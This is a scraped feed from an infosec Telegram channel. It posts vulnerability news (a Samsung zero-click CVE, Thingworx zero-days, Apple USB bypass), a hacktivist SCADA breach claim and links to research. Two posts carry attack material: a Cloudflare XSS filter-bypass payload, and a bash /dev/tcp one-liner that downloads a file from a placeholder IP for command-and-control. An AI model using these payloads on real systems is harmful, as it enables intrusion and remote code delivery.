cKure Red
2.35K subscribers
70 photos
32 videos
21 files
447 links
The director's cut on critical feeds from InfoSec world ๐ŸŒŽ

Main Channel: @cKure

โ˜•๏ธ or queries email us
๐Ÿ“จ i@ckure.org
Download Telegram
cKure Red pinned ยซ๐Ÿ†• JWT Breaker: A web based client-side JSON Web Token brute-forcing utility. https://ckure.esy.es/rx/tools/jwt/ To generate tokens, use: https://ckure.esy.es/rx/tools/jwt/gen.phpยป
๐Ÿค Google Project Zero researcher uncovers Zero-Click Zero-Day exploit targeting Samsung devices.

CVE-2024-49415: Security flaw impacting Monkey's Audio (APE) decoder on Samsung smartphones that could lead to code execution.

Out-of-bounds write in libsaped.so prior to SMR Dec-2024 Release 1 allows remote attackers to execute arbitrary code.

https://security.samsungmobile.com/securityUpdate.smsb


The function saped_rec in libsaped.so writes to a dmabuf allocated by the C2 media service, which always appears to have size 0x120000.

https://project-zero.issues.chromium.org/issues/368695689


https://thehackernews.com/2025/01/google-project-zero-researcher-uncovers.html
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2๐Ÿ˜22
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ“ฑ Scam by Apple as it created a plain-text protocol and said it protects user privacy.
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2๐Ÿ‘1๐Ÿค”1๐Ÿคฃ1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ’€ Iran ๐Ÿ‡ฎ๐Ÿ‡ท based hacker group successfully compromised SCADA systems in Israel ๐Ÿ‡ฎ๐Ÿ‡ฑ amid a prolific Cyber-Attack. The group (Handala Hack) shared this video, showing the desperation of the operator who could not get his systems working.

The CCTV footage and other documents were also exfilterated during the Cyber-Attack.

Victim organisation: Tosaf, Israel
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ7๐Ÿ‘1๐Ÿ˜1
Alleged Cloudflare XSS protection bypass: โš”๏ธ


"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>

๐• | 0x0SojalSec
๐Ÿค”2
๐Ÿ˜’ Two zero-day vulnerabilities exist in the latest version of Thingworx ICS-SCADA Web based software platform for IoT devices as a CMS.

Researcher: M-Shameem
Please open Telegram to view this post
VIEW IN TELEGRAM
cKure Red pinned ยซ๐Ÿ˜’ Two zero-day vulnerabilities exist in the latest version of Thingworx ICS-SCADA Web based software platform for IoT devices as a CMS. Researcher: M-Shameemยป
๐Ÿ’ปFirst analysis of Apple's USB Restricted Mode bypass (CVE-2025-24200).

https://blog.quarkslab.com/first-analysis-of-apples-usb-restricted-mode-bypass-cve-2025-24200.html
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ11
๐Ÿ’Ž Sandbox evasions are a strange world: a tiny mouse jitter can decide the fate of a whole attack chain. CPR describes statistical attacks they launched on sandbox human interaction modules, then gives full mitigation, including exposition and source code.

Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions.

https://research.checkpoint.com/2025/the-cat-and-mouse-game-exploiting-statistical-weaknesses-in-human-interaction-anti-evasions/
Please open Telegram to view this post
VIEW IN TELEGRAM
5๏ธโƒฃ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers.

bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'

Source: Linkedin | Harvey Spec
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘Ž5
๐Ÿ‡ฐ๐Ÿ‡ตBybit hack technical analysis of the Hack by Lazarus group, North Korean state spinsored hacking group (as calimed by the FBI, United States ๐Ÿ‡บ๐Ÿ‡ธ).
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฉ1